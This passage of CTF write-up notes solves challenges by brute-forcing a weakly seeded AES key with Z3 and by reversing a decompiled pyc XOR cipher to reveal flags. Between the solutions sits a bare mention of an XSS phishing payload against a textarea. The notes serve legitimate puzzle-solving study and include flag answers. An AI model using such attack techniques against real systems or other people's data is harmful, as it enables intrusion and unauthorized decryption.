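    ciphertext = file_in.read()

# The key comes from random.seed(x + y + z) with each value at most 100, so
# there are at most 301 distinct keys.
# NOTE(review): that is why the file is recoverable; real key material must
# come from a CSPRNG such as the secrets module, not a seeded random.
tried_seeds = set()
while s.check() == sat:
    f = s.model()
    rx = f[x].as_long()
    ry = f[y].as_long()
    rz = f[z].as_long()
    # Exclude this assignment so the next check() yields a different one.
    s.add(Or(x != rx, y != ry, z != rz))

    seed = rx + ry + rz
    if seed in tried_seeds:
        continue
    tried_seeds.add(seed)

    random.seed(seed)
    key = random.randbytes(16)
    cipher = AES.new(key, AES.MODE_EAX, nonce=nonce)
    try:
        # A wrong key fails tag verification with ValueError; move on to the
        # next candidate instead of aborting the whole search.
        data = cipher.decrypt_and_verify(ciphertext, tag)
    except ValueError:
        continue
    print("The flag is:", data)
    break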

9

messagebox

xss钓鱼,打textareapayload

img

pyc

uncompyle6 -o 1.py secret.pyc 
import random

def decrypt_file(encrypted_file_path):
    """XOR-decrypt a file with the fixed-seed keystream and save the result.

    The keystream is ``random.randint(0, 128)`` per input byte after
    ``random.seed(114514)``. Output goes to the input path with ".enc"
    replaced by ".dec"; that path is returned.
    """
    # Same seed as the encryptor, so the same keystream is reproduced.
    random.seed(114514)
    with open(encrypted_file_path, "rb") as source:
        ciphertext = source.read()

    plaintext = bytearray()
    for value in ciphertext:
        key = random.randint(0, 128)
        # NOTE(review): chr(...).encode() emits two UTF-8 bytes for any
        # result of 128 or more, so the output is byte-exact only while
        # every decrypted value stays in the ASCII range.
        plaintext.extend(chr(value ^ key).encode())

    target_path = encrypted_file_path.replace(".enc", ".dec")
    with open(target_path, "wb") as sink:
        sink.write(bytes(plaintext))
    return target_path
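# Decrypt the challenge file and report where the plaintext was written.
# The trailing "%" after the print call was removed; it made the line a
# syntax error.
decrypted_file_path = decrypt_file("flag.enc")
print(f"Decrypted file saved as: {decrypted_file_path}")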

# flag{U_R_g00d_at_do1n_pyc}